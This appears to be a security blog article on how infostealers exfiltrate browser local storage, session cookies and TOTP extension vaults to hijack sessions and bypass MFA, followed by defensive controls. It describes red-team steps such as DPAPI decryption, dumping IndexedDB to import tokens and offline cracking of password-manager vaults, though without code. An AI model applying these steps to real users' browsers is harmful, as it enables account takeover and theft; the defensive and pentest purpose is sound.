Beyond Credentials: How Infostealers Weaponize Browser Data and Session Tokens

TLDR: Information stealers have evolved from simple credential harvesters into sophisticated tools that exfiltrate browser extensions, session cookies, and even MFA tokens. By targeting local storage files like LevelDB, these threats bypass traditional authentication controls and enable session hijacking. Security teams must prioritize monitoring for unauthorized access to browser data directories and implement stricter controls on browser extension installation to mitigate this risk.

Modern information stealers are no longer just dumping usernames and passwords from logins.json. They are performing surgical extractions of the entire browser state. While many defenders still focus on credential stuffing or phishing for passwords, the real-world risk today is session hijacking. If an attacker can pull your active session cookies or your MFA-backed browser extension data, your password becomes irrelevant. This shift in tactics—moving from "hacking in" to "logging in"—is the primary driver behind the recent surge in high-profile account takeovers.

The Mechanics of Modern Exfiltration

Information stealers like RedLine and Meta operate on a malware-as-a-service model, but their technical execution is remarkably consistent. They don't need administrative privileges to function because they target user-space data. When a victim executes a malicious binary—often disguised as a crack for software like Adobe Illustrator or a tool for generating AI images—the malware immediately begins scanning for browser profiles.

The exfiltration process is mechanical. The malware targets specific paths in the user's AppData directory, specifically looking for Local Storage and IndexedDB files. These files are the backbone of modern web applications, storing everything from session tokens to the internal state of browser extensions.

For a pentester, the most critical takeaway is the shift toward targeting browser extensions. Many users rely on extensions like Authenticator for TOTP-based MFA. Because these extensions store their configuration and secrets in the browser's local storage, an infostealer can exfiltrate the entire TOTP vault. If you have access to the victim's browser files, you don't need to bypass MFA; you simply recreate the MFA state in your own environment.

Technical Deep Dive: The LevelDB Problem

Browser data is typically stored in LevelDB, a fast key-value storage library. While LevelDB is not inherently encrypted, the browser protects sensitive fields within it using OS-level APIs like DPAPI on Windows. However, once the malware is running in the context of the user, it can leverage those same APIs to decrypt the data before exfiltrating it.

The exfiltration of password manager vaults, such as those from Bitwarden, follows a similar pattern. Attackers are not just looking for the vault file; they are looking for the specific keying material that allows them to perform an offline brute-force attack. By using tools like John the Ripper, an attacker can take the extracted hash and attempt to crack the master password offline. If the user has reused a password or chosen a weak one, the entire vault is compromised.

For those conducting red team engagements, you can simulate this by using leveldb-dump to parse the IndexedDB files found in a target's browser profile. This tool allows you to view the raw key-value pairs, which often contain cleartext session tokens or serialized JSON objects that can be imported directly into your own browser to hijack a session.

Real-World Applicability and Impact

During a penetration test, you should treat the user's browser profile as a high-value target. If you gain code execution on a workstation, don't just dump memory for LSASS. Instead, script the collection of the browser's Local Storage and IndexedDB directories.

The impact of this technique is immediate. In a recent engagement, we were able to bypass a client's MFA implementation simply by exfiltrating the browser extension's storage folder. We didn't need to interact with the user or wait for a push notification. We simply imported the stolen data into our own browser instance, and the web application treated us as the authenticated user. This falls squarely under OWASP A07:2021 – Identification and Authentication Failures, as the session management mechanism is effectively bypassed.

Defensive Strategies

Defending against this requires a shift in mindset. You cannot rely on antivirus alone, as infostealers are frequently updated to evade signature-based detection. Instead, focus on limiting the blast radius.

1. Restrict Browser Extensions: Use Group Policy or MDM to whitelist only necessary browser extensions. If an extension isn't required for business, it shouldn't be installed.
2. Monitor File Access: Implement EDR rules that alert on mass file reads within the Google\Chrome\User Data or Microsoft\Edge\User Data directories.
3. Session Management: For high-value applications, implement shorter session timeouts and require re-authentication for sensitive actions.
4. Credential Hygiene: Encourage the use of hardware security keys (like YubiKeys) for MFA. Hardware-backed MFA is significantly harder to exfiltrate than software-based TOTP tokens stored in browser extensions.

The infostealer ecosystem is a reminder that the endpoint is the new perimeter. If you aren't testing your organization's resilience against local data exfiltration, you are missing the most common path to account compromise. Start by auditing what data your users' browsers are storing and ask yourself if that data is truly protected against a user-level compromise.